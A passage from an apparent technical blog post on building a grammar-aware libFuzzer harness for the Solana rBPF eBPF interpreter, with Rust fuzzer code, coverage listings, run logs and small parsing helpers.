 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|    130|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|   135k|            }
 1106|       |        }
 1107|       |
 1108|    419|        Err(EbpfError::ExecutionOverrun(
 1109|    419|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    419|        ))
 1111|    763|    }

Unfortunately, this fuzzer doesn’t seem to achieve the coverage we expect. Several instructions are missed (note the 0 coverage on some branches of the match) and there are no jumps, calls, or other control-flow-relevant instructions. This is largely because throwing random bytes at any parser just isn’t going to be effective; most things will get caught at the verification stage, and very little will actually test the program.
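Scanning a long coverage listing by eye for zero counts gets tedious, so here is a minimal sketch of how one might pull the never-executed lines out of `rust-cov show` output automatically. It assumes the `<line>|<count>|<source>` row shape seen above; the names `CovRow`, `parse_row`, and `uncovered_lines` are made up for illustration and are not part of any tool.

```rust
/// One parsed row of `rust-cov show` output: `<line>|<count>|<source>`.
#[derive(Debug, PartialEq)]
pub struct CovRow {
    pub line: u32,
    /// `None` when the count column is blank (the line carries no counter).
    pub count: Option<String>,
}

/// Parses a row such as ` 1066|      0|    resolved = true;`.
/// Returns `None` for region markers (e.g. `   ^0`) and other non-row lines.
pub fn parse_row(row: &str) -> Option<CovRow> {
    // Split into at most three parts so `|` inside the source text is kept intact.
    let mut parts = row.splitn(3, '|');
    let line = parts.next()?.trim().parse::<u32>().ok()?;
    let count = parts.next()?.trim();
    Some(CovRow {
        line,
        count: if count.is_empty() { None } else { Some(count.to_string()) },
    })
}

/// Collects the source line numbers that were instrumented but never executed.
pub fn uncovered_lines(report: &str) -> Vec<u32> {
    report
        .lines()
        .filter_map(parse_row)
        .filter(|r| r.count.as_deref() == Some("0"))
        .map(|r| r.line)
        .collect()
}
```

Feeding it the listing above would report lines such as 1066 and 1069 to 1071 (the BPF-to-BPF call path), which is exactly the kind of gap we want the next fuzzer to close.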

We must improve this before we continue or we’ll be waiting forever for our fuzzer to find useful bugs.

At this point, we’re about two hours into development.

The smart fuzzer

eBPF is quite a simple instruction set; you can read the whole definition in just a few pages. Knowing this: why don’t we constrain our input to just these instructions? This approach is commonly called “grammar-aware” fuzzing on account of the fact that the inputs are constrained to some grammar. It is very powerful as a concept, and is used to test a variety of large targets which have strict parsing rules.
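To make the idea concrete, here is a toy sketch of grammar-aware input decoding using only the standard library. It is not how rBPF's fuzzer works internally (that relies on the `arbitrary` crate), and the three-instruction grammar, `ToyOp`, and `decode_program` are all hypothetical. The point is only that every byte string the fuzzer produces maps to a well-formed program, so no executions are wasted on inputs the parser would reject outright.

```rust
/// A toy three-instruction grammar (hypothetical; far smaller than eBPF).
#[derive(Debug, PartialEq, Clone, Copy)]
pub enum ToyOp {
    Add { dst: u8, imm: i16 },
    Jump { off: i16 },
    Exit,
}

/// Decodes raw fuzzer bytes into a sequence of well-formed `ToyOp`s.
/// Every 4-byte chunk becomes exactly one instruction; trailing bytes that
/// do not fill a whole chunk are dropped.
pub fn decode_program(raw: &[u8]) -> Vec<ToyOp> {
    raw.chunks_exact(4)
        .map(|c| {
            let operand = i16::from_le_bytes([c[2], c[3]]);
            // Reduce the selector byte modulo the number of variants so that
            // all 256 possible values select *some* instruction.
            match c[0] % 3 {
                0 => ToyOp::Add { dst: c[1], imm: operand },
                1 => ToyOp::Jump { off: operand },
                _ => ToyOp::Exit,
            }
        })
        .collect()
}
```

For instance, `decode_program(&[0, 7, 0x34, 0x12])` yields a single `Add` with `dst` 7 and `imm` 0x1234. Note that `dst` is left unconstrained here: the grammar fixes the shape of an instruction, not whether its operands make sense.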

To create this grammar-aware fuzzer, I inspected the helpfully named insn_builder.rs that rBPF provides, which would allow me to create instructions. Now, all I needed to do was represent all the different instructions. By cross-referencing with the eBPF documentation, we can represent each possible operation in a single enum. You can see the whole grammar.rs in the rBPF repo if you wish, but the two most relevant sections are provided below.

Defining the enum that represents all instructions

#[derive(arbitrary::Arbitrary, Debug, Eq, PartialEq)]
pub enum FuzzedOp {
    Add(Source),
    Sub(Source),
    Mul(Source),
    Div(Source),
    BitOr(Source),
    BitAnd(Source),
    LeftShift(Source),
    RightShift(Source),
    Negate,
    Modulo(Source),
    BitXor(Source),
    Mov(Source),
    SRS(Source),
    SwapBytes(Endian),
    Load(MemSize),
    LoadAbs(MemSize),
    LoadInd(MemSize),
    LoadX(MemSize),
    Store(MemSize),
    StoreX(MemSize),
    Jump,
    JumpC(Cond, Source),
    Call,
    Exit,
}

Translating FuzzedOps to BpfCode

pub type FuzzProgram = Vec<FuzzedInstruction>;

pub fn make_program(prog: &FuzzProgram, arch: Arch) -> BpfCode {
    let mut code = BpfCode::default();
    for inst in prog {
        match inst.op {
            FuzzedOp::Add(src) => code
                .add(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Sub(src) => code
                .sub(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mul(src) => code
                .mul(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Div(src) => code
                .div(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitOr(src) => code
                .bit_or(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitAnd(src) => code
                .bit_and(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LeftShift(src) => code
                .left_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::RightShift(src) => code
                .right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Negate => code
                .negate(arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Modulo(src) => code
                .modulo(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitXor(src) => code
                .bit_xor(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mov(src) => code
                .mov(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SRS(src) => code
                .signed_right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SwapBytes(endian) => code
                .swap_bytes(endian)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Load(mem) => code
                .load(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadAbs(mem) => code
                .load_abs(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadInd(mem) => code
                .load_ind(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadX(mem) => code
                .load_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Store(mem) => code
                .store(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::StoreX(mem) => code
                .store_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Jump => code
                .jump_unconditional()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::JumpC(cond, src) => code
                .jump_conditional(cond, src)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Call => code
                .call()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Exit => code
                .exit()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
        };
    }
    code
}

You’ll see here that our generation doesn’t really care to ensure that instructions are valid, just that they’re in the right format. For example, we don’t verify registers, addresses, jump targets, etc.; we just slap it together and see if it works. This is to prevent over-specialisation, where our attempts to constrain the fuzzer produce only “boring” inputs and never exercise the cases that would normally be considered invalid.
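The difference between “right format” and “valid” is easiest to see at the byte level. The sketch below packs the standard 8-byte eBPF instruction layout (8-bit opcode, two 4-bit register fields, 16-bit offset, 32-bit immediate, little-endian) and pairs it with a deliberately tiny range check. `RawInsn` and `registers_in_range` are hypothetical names, and the check is only a stand-in: it uses the classic eBPF register file r0 to r10, and rBPF's actual verifier rules differ in detail.

```rust
/// The fixed 8-byte eBPF instruction layout.
#[derive(Debug, Clone, Copy, PartialEq)]
pub struct RawInsn {
    pub opc: u8,
    pub dst: u8,
    pub src: u8,
    pub off: i16,
    pub imm: i32,
}

impl RawInsn {
    /// Packs the fields little-endian. Register numbers are masked to 4 bits,
    /// with `dst` in the low nibble and `src` in the high nibble of byte 1.
    pub fn encode(&self) -> [u8; 8] {
        let mut out = [0u8; 8];
        out[0] = self.opc;
        out[1] = ((self.src & 0x0f) << 4) | (self.dst & 0x0f);
        out[2..4].copy_from_slice(&self.off.to_le_bytes());
        out[4..8].copy_from_slice(&self.imm.to_le_bytes());
        out
    }
}

/// Hypothetical stand-in for one verifier rule: classic eBPF defines
/// registers r0 through r10, so a 4-bit field can hold out-of-range values.
pub fn registers_in_range(insn: &RawInsn) -> bool {
    insn.dst <= 10 && insn.src <= 10
}
```

An instruction with `dst: 13` encodes without complaint, yet fails the range check. Those are the inputs we want to keep generating: if the verifier ever lets one through, the interpreter or JIT gets to deal with something it was never meant to see.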

Okay – let’s make a fuzzer with this. The only real difference here is that our input format now uses our new FuzzProgram type instead of raw bytes:

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}

The whole fuzzer, though really it's not that different

This fuzzer represents a particular stage in development. The differential fuzzer is significantly different in a few key aspects that will be discussed later.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    ebpf, // needed for ebpf::MM_INPUT_START below
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}

fuzz_target!(|data: FuzzData| {
    let prog = make_program(&data.prog, data.arch);
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1 << 16 },
    )));
});

Evaluation

Let’s see how well this version covers our target now.

$ cargo +nightly fuzz run smart -- -max_total_time=300
... snip ...
#1449846	REDUCE cov: 1730 ft: 6369 corp: 1019/168Kb lim: 4096 exec/s: 4832 rss: 358Mb L: 267/2963 MS: 1 EraseBytes-
#1450798	NEW    cov: 1730 ft: 6370 corp: 1020/168Kb lim: 4096 exec/s: 4835 rss: 358Mb L: 193/2963 MS: 2 InsertByte-InsertRepeatedBytes-
#1451609	NEW    cov: 1730 ft: 6371 corp: 1021/168Kb lim: 4096 exec/s: 4838 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452095	NEW    cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4840 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452830	DONE   cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4826 rss: 358Mb
Done 1452830 runs in 301 second(s)

Notice that the number of inputs tried (the leftmost number on each line) is nearly half of what the first fuzzer managed, but our cov and ft values are significantly higher.
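If you want to compare runs without squinting at logs, the status lines are easy to parse. Here is a rough sketch that extracts the execution count, `cov` (covered code blocks or edges), and `ft` (libFuzzer's finer-grained “features” signal) from one line. The struct and function names are my own, and the parser assumes the line shape shown above.

```rust
/// Counters pulled from one libFuzzer status line (field names are ours).
#[derive(Debug, PartialEq)]
pub struct FuzzStatus {
    pub execs: u64,
    pub cov: u64,
    pub ft: u64,
}

/// Parses a line such as
/// `#1452830 DONE   cov: 1730 ft: 6372 corp: 1022/169Kb ...`.
/// Returns `None` if the line does not start with `#<n>` or lacks `cov:`/`ft:`.
pub fn parse_status(line: &str) -> Option<FuzzStatus> {
    let mut tokens = line.split_whitespace();
    let execs = tokens.next()?.strip_prefix('#')?.parse::<u64>().ok()?;
    let (mut cov, mut ft) = (None, None);
    while let Some(tok) = tokens.next() {
        match tok {
            // Each label is followed by its value as the next token.
            "cov:" => cov = tokens.next()?.parse::<u64>().ok(),
            "ft:" => ft = tokens.next()?.parse::<u64>().ok(),
            _ => {}
        }
    }
    Some(FuzzStatus { execs, cov: cov?, ft: ft? })
}
```

Running this over the final `DONE` line of two fuzzers gives three numbers per run to put side by side, which is all the comparison above really needs.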

Let’s evaluate that coverage a little more specifically:

$ cargo +nightly fuzz coverage smart
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/smart -instr-profile=fuzz/coverage/smart/coverage.profdata -show-line-counts-or-regions -show-instantiations -name=execute_program_interpreted_inner

Command output of rust-cov

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    886|    fn execute_program_interpreted_inner(
  710|    886|        &mut self,
  711|    886|        instruction_meter: &mut I,
  712|    886|        initial_insn_count: u64,
  713|    886|        last_insn_count: &mut u64,
  714|    886|    ) -> ProgramResult<E> {
  715|    886|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    886|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    886|        reg[1] = ebpf::MM_INPUT_START;
  718|    886|
  719|    886|        // Loop on instructions
  720|    886|        let config = self.executable.get_config();
  721|    886|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    886|        let mut remaining_insn_count = initial_insn_count;
  723|  2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|  2.16M|            *last_insn_count += 1;
  725|  2.16M|            let pc = next_pc;
  726|  2.16M|            next_pc += 1;
  727|  2.16M|            let mut instruction_width = 1;
  728|  2.16M|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|  2.16M|            let dst = insn.dst as usize;
  730|  2.16M|            let src = insn.src as usize;
  731|  2.16M|
  732|  2.16M|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|  2.16M|            }
  738|       |
  739|  2.16M|            match insn.opc {
  740|  2.16M|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|      6|                    match insn.opc {
  742|      2|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|      4|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      5|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  757|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  762|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      6|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      6|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  767|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  772|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      9|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^1
  777|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  782|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  787|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      6|                ebpf::LD_DW_IMM  => {
  796|      6|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      6|                    instruction_width = 2;
  798|      6|                    next_pc += 1;
  799|      6|                    reg[dst] = insn.imm as u64;
  800|      6|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     21|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     21|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^4
  806|      4|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|      4|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  811|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|     26|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^19
  816|     19|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|      5|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  821|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^1
  828|      1|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     11|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     11|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^6
  833|      6|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^6
  838|      6|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     16|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     16|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^2
  850|      2|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^2
  860|      2|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|    136|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|     18|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|     94|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|     14|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|    226|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|     15|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|     98|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|      0|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|      0|                    }
  886|      0|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|      0|                    if reg[src] as i32 == 0 {
  890|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|      0|                    }
  892|      0|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|      0|                    }
  895|      0|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    102|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|     13|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|     46|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|     16|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      4|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|     32|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      2|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|      4|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|     54|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|     90|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|     20|                    if reg[src] as u32 == 0 {
  909|      6|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|     14|                    }
  911|     14|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|     96|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|     14|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|     59|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|      7|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|     15|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|    236|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      2|                ebpf::LE         => {
  920|      2|                    reg[dst] = match insn.imm {
  921|      1|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      1|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      2|                ebpf::BE         => {
  930|      2|                    reg[dst] = match insn.imm {
  931|      1|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      1|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|  16.7k|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
